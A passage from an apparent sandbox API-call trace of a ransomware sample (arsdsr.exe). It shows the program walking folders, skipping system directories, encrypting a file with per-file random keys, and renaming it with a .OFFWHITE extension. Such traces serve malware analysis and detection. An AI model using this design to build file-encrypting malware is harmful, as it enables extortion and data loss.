ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0140.214] lstrcmpiW (lpString1="Acrobat", lpString2=".") returned 1 [0140.214] lstrcmpiW (lpString1="Acrobat", lpString2="..") returned 1 [0140.214] lstrcmpiW (lpString1="Acrobat", lpString2="...") returned 1 [0140.214] lstrcmpiW (lpString1="Acrobat", lpString2="windows") returned -1 [0140.214] lstrcmpiW (lpString1="Acrobat", lpString2="$recycle.bin") returned 1 [0140.214] lstrcmpiW (lpString1="Acrobat", lpString2="rsa") returned -1 [0140.214] lstrcmpiW (lpString1="Acrobat", lpString2="ntuser.dat") returned -1 [0140.214] lstrcmpiW (lpString1="Acrobat", lpString2="programdata") returned -1 [0140.215] lstrcmpiW (lpString1="Acrobat", lpString2="appdata") returned -1 [0140.215] lstrcmpiW (lpString1="Acrobat", lpString2="program files") returned -1 [0140.215] lstrcmpiW (lpString1="Acrobat", lpString2="program files (x86)") returned -1 [0140.215] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Adobe\\" | out: lpString1="C:/Users\\All Users\\Adobe\\") returned="C:/Users\\All Users\\Adobe\\" [0140.215] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\", lpString2="Acrobat" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat") returned="C:/Users\\All Users\\Adobe\\Acrobat" [0140.215] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\Acrobat", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\") returned="C:/Users\\All Users\\Adobe\\Acrobat\\" [0140.215] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Adobe\\Acrobat\\" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\") returned="C:/Users\\All Users\\Adobe\\Acrobat\\" [0140.215] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\*.*") returned="C:/Users\\All Users\\Adobe\\Acrobat\\*.*" [0140.215] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Adobe\\Acrobat\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0140.215] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0140.215] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0140.215] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0140.215] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0140.215] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="10.0", cAlternateFileName="")) returned 1 [0140.215] lstrcmpiW (lpString1="10.0", lpString2=".") returned 1 [0140.215] lstrcmpiW (lpString1="10.0", lpString2="..") returned 1 [0140.215] lstrcmpiW (lpString1="10.0", lpString2="...") returned 1 [0140.216] lstrcmpiW (lpString1="10.0", lpString2="windows") returned -1 [0140.216] lstrcmpiW (lpString1="10.0", lpString2="$recycle.bin") returned 1 [0140.216] lstrcmpiW (lpString1="10.0", lpString2="rsa") returned -1 [0140.216] lstrcmpiW (lpString1="10.0", lpString2="ntuser.dat") returned -1 [0140.216] lstrcmpiW (lpString1="10.0", lpString2="programdata") returned -1 [0140.216] lstrcmpiW (lpString1="10.0", lpString2="appdata") returned -1 [0140.216] lstrcmpiW (lpString1="10.0", lpString2="program files") returned -1 [0140.216] lstrcmpiW (lpString1="10.0", lpString2="program files (x86)") returned -1 [0140.216] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Adobe\\Acrobat\\" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\") returned="C:/Users\\All Users\\Adobe\\Acrobat\\" [0140.216] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\", lpString2="10.0" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0" [0140.216] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\" [0140.216] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\" [0140.216] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\*.*") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\*.*" [0140.216] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0140.216] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0140.216] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0140.216] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0140.217] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0140.217] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 1 [0140.217] lstrcmpiW (lpString1="Replicate", lpString2=".") returned 1 [0140.217] lstrcmpiW (lpString1="Replicate", lpString2="..") returned 1 [0140.217] lstrcmpiW (lpString1="Replicate", lpString2="...") returned 1 [0140.217] lstrcmpiW (lpString1="Replicate", lpString2="windows") returned -1 [0140.217] lstrcmpiW (lpString1="Replicate", lpString2="$recycle.bin") returned 1 [0140.217] lstrcmpiW (lpString1="Replicate", lpString2="rsa") returned -1 [0140.217] lstrcmpiW (lpString1="Replicate", lpString2="ntuser.dat") returned 1 [0140.217] lstrcmpiW (lpString1="Replicate", lpString2="programdata") returned 1 [0140.217] lstrcmpiW (lpString1="Replicate", lpString2="appdata") returned 1 [0140.217] lstrcmpiW (lpString1="Replicate", lpString2="program files") returned 1 [0140.217] lstrcmpiW (lpString1="Replicate", lpString2="program files (x86)") returned 1 [0140.217] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\" [0140.217] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\", lpString2="Replicate" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate" [0140.217] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\" [0140.217] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\" [0140.217] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*.*") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*.*" [0140.217] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x540052, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0140.284] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0140.284] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x540052, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0140.284] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0140.284] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0140.284] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x540052, dwReserved1=0x295dcf0, cFileName="Security", cAlternateFileName="")) returned 1 [0140.284] lstrcmpiW (lpString1="Security", lpString2=".") returned 1 [0140.284] lstrcmpiW (lpString1="Security", lpString2="..") returned 1 [0140.284] lstrcmpiW (lpString1="Security", lpString2="...") returned 1 [0140.284] lstrcmpiW (lpString1="Security", lpString2="windows") returned -1 [0140.285] lstrcmpiW (lpString1="Security", lpString2="$recycle.bin") returned 1 [0140.285] lstrcmpiW (lpString1="Security", lpString2="rsa") returned 1 [0140.285] lstrcmpiW (lpString1="Security", lpString2="ntuser.dat") returned 1 [0140.285] lstrcmpiW (lpString1="Security", lpString2="programdata") returned 1 [0140.285] lstrcmpiW (lpString1="Security", lpString2="appdata") returned 1 [0140.285] lstrcmpiW (lpString1="Security", lpString2="program files") returned 1 [0140.286] lstrcmpiW (lpString1="Security", lpString2="program files (x86)") returned 1 [0140.286] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\" [0140.286] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\", lpString2="Security" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0140.286] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\" [0140.286] lstrcpyW (in: lpString1=0x295cff0, lpString2="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\" [0140.286] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*" [0140.286] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*", lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x680066, dwReserved1=0x295d670, cFileName=".", cAlternateFileName="")) returned 0x544790 [0140.286] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0140.286] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x680066, dwReserved1=0x295d670, cFileName="..", cAlternateFileName="")) returned 1 [0140.287] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0140.287] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0140.287] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x680066, dwReserved1=0x295d670, cFileName="directories.acrodata", cAlternateFileName="DIRECT~1.ACR")) returned 1 [0140.287] lstrcmpiW (lpString1="directories.acrodata", lpString2=".") returned 1 [0140.287] lstrcmpiW (lpString1="directories.acrodata", lpString2="..") returned 1 [0140.287] lstrcmpiW (lpString1="directories.acrodata", lpString2="...") returned 1 [0140.287] lstrcmpiW (lpString1="directories.acrodata", lpString2="windows") returned -1 [0140.287] lstrcmpiW (lpString1="directories.acrodata", lpString2="$recycle.bin") returned 1 [0140.287] lstrcmpiW (lpString1="directories.acrodata", lpString2="rsa") returned -1 [0140.287] lstrcmpiW (lpString1="directories.acrodata", lpString2="ntuser.dat") returned -1 [0140.287] lstrcmpiW (lpString1="directories.acrodata", lpString2="programdata") returned -1 [0140.287] lstrcmpiW (lpString1="directories.acrodata", lpString2="appdata") returned 1 [0140.287] lstrcmpiW (lpString1="directories.acrodata", lpString2="program files") returned -1 [0140.287] lstrcmpiW (lpString1="directories.acrodata", lpString2="program files (x86)") returned -1 [0140.287] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\" [0140.287] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpString2="directories.acrodata" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" [0140.287] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.287] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.287] PathFindExtensionW (pszPath="directories.acrodata") returned=".acrodata" [0140.287] lstrcmpiW (lpString1=".acrodata", lpString2=".exe") returned -1 [0140.287] lstrcmpiW (lpString1=".acrodata", lpString2=".log") returned -1 [0140.287] lstrcmpiW (lpString1=".acrodata", lpString2=".cab") returned -1 [0140.287] lstrcmpiW (lpString1=".acrodata", lpString2=".cmd") returned -1 [0140.287] lstrcmpiW (lpString1=".acrodata", lpString2=".com") returned -1 [0140.288] lstrcmpiW (lpString1=".acrodata", lpString2=".cpl") returned -1 [0140.288] lstrcmpiW (lpString1=".acrodata", lpString2=".ini") returned -1 [0140.288] lstrcmpiW (lpString1=".acrodata", lpString2=".dll") returned -1 [0140.288] lstrcmpiW (lpString1=".acrodata", lpString2=".url") returned -1 [0140.288] lstrcmpiW (lpString1=".acrodata", lpString2=".ttf") returned -1 [0140.288] lstrcmpiW (lpString1=".acrodata", lpString2=".mp3") returned -1 [0140.288] lstrcmpiW (lpString1=".acrodata", lpString2=".pif") returned -1 [0140.288] lstrcmpiW (lpString1=".acrodata", lpString2=".mp4") returned -1 [0140.288] lstrcmpiW (lpString1=".acrodata", lpString2=".OFFWHITE") returned -1 [0140.288] lstrcmpiW (lpString1=".acrodata", lpString2=".msi") returned -1 [0140.288] lstrcmpiW (lpString1="directories.acrodata", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0140.288] GetProcessHeap () returned 0x500000 [0140.288] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5221d0 [0140.288] CreateFileW (lpFileName="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0140.288] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=479) returned 1 [0140.289] GetProcessHeap () returned 0x500000 [0140.289] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0140.289] GetProcessHeap () returned 0x500000 [0140.289] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0140.289] GetProcessHeap () returned 0x500000 [0140.289] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0140.289] GetProcessHeap () returned 0x500000 [0140.289] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0140.289] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.289] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.289] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0140.289] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.289] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.289] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0140.289] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.289] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.289] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295c910*=0x100) returned 1 [0140.289] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.290] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.290] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295c90c*=0x100) returned 1 [0140.290] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x1df, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.290] SetLastError (dwErrCode=0x0) [0140.290] WriteFile (in: hFile=0x1e4, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0140.291] GetLastError () returned 0x0 [0140.291] GetLastError () returned 0x0 [0140.291] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x2df, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.292] WriteFile (in: hFile=0x1e4, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0140.292] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x3df, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.292] WriteFile (in: hFile=0x1e4, lpBuffer=0x5221d0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x5221d0*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0140.292] GetProcessHeap () returned 0x500000 [0140.292] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1df) returned 0x52b858 [0140.292] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.292] ReadFile (in: hFile=0x1e4, lpBuffer=0x52b858, nNumberOfBytesToRead=0x1df, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x52b858*, lpNumberOfBytesRead=0x295cb40*=0x1df, lpOverlapped=0x0) returned 1 [0140.292] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.292] WriteFile (in: hFile=0x1e4, lpBuffer=0x52b858*, nNumberOfBytesToWrite=0x1df, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x52b858*, lpNumberOfBytesWritten=0x295cb4c*=0x1df, lpOverlapped=0x0) returned 1 [0140.292] GetProcessHeap () returned 0x500000 [0140.292] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52b858 | out: hHeap=0x500000) returned 1 [0140.292] CloseHandle (hObject=0x1e4) returned 1 [0140.299] GetProcessHeap () returned 0x500000 [0140.299] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0140.299] GetProcessHeap () returned 0x500000 [0140.299] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0140.299] GetProcessHeap () returned 0x500000 [0140.299] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0140.299] GetProcessHeap () returned 0x500000 [0140.299] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0140.299] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" [0140.300] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.OFFWHITE") returned="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.OFFWHITE" [0140.300] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), lpNewFileName="C:/Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.OFFWHITE" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata.offwhite")) returned 1 [0140.300] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x680066, dwReserved1=0x295d670, cFileName="directories.acrodata", cAlternateFileName="DIRECT~1.ACR")) returned 0 [0140.301] FindClose (in: hFindFile=0x544790 | out: hFindFile=0x544790) returned 1 [0140.301] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, 